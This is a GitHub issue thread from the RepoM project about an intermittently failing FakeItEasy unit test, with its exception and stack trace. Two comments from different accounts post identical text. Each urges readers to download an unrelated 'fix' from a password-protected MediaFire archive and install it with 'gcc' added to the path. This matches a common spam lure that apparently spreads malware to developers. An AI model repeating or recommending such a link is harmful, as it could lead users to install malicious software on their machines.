### ISSUE TITLE
Fix fragille test

### ISSUE THREAD

**Issue by coenm** [coenm/RepoM#138]
Sometimes, this test fails in the pipeline:

`RepoM.Plugin.Heidi.Tests.Internal.HeidiConfigurationServiceTests.Events_ShouldNotBeProcessed_WhenWrongFilename`

Exception:

```
FakeItEasy.ExpectationException :

Assertion failed for the following call:
RepoM.Plugin.Heidi.Internal.IHeidiPortableConfigReader.ParseAsync(filename: "C:\heidi\heidi.portable.txt")
Expected to find it never but found it once among the calls:
1: RepoM.Plugin.Heidi.Internal.IHeidiPortableConfigReader.ParseAsync(filename: "C:\heidi\heidi.portable.txt")

```

Stack trace:

```
   at FakeItEasy.Core.FakeAsserter.AssertWasCalled(Func`2 callPredicate, Action`1 callDescriber, CallCountConstraint callCountConstraint) in D:\a\FakeItEasy\FakeItEasy\src\FakeItEasy\Core\FakeAsserter.cs:line 40
   at FakeItEasy.Configuration.RuleBuilder.MustHaveHappened(CallCountConstraint callCountConstraint) in D:\a\FakeItEasy\FakeItEasy\src\FakeItEasy\Configuration\RuleBuilder.cs:line 170
   at FakeItEasy.Configuration.RuleBuilder.MustHaveHappened(Int32 numberOfTimes, Times timesOption) in D:\a\FakeItEasy\FakeItEasy\src\FakeItEasy\Configuration\RuleBuilder.cs:line 147
   at FakeItEasy.Configuration.RuleBuilder.ReturnValueConfiguration`1.MustHaveHappened(Int32 numberOfTimes, Times timesOption) in D:\a\FakeItEasy\FakeItEasy\src\FakeItEasy\Configuration\RuleBuilder.cs:line 254
   at FakeItEasy.AssertConfigurationExtensions.MustNotHaveHappened(IAssertConfiguration configuration) in D:\a\FakeItEasy\FakeItEasy\src\FakeItEasy\AssertConfigurationExtensions.cs:line 30
   at RepoM.Plugin.Heidi.Tests.Internal.HeidiConfigurationServiceTests.Events_ShouldNotBeProcessed_WhenWrongFilename() in D:\a\1\s\tests\RepoM.Plugin.Heidi.Tests\Internal\HeidiConfigurationServiceTests.cs:line 331
--- End of stack trace from previous location ---
```

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
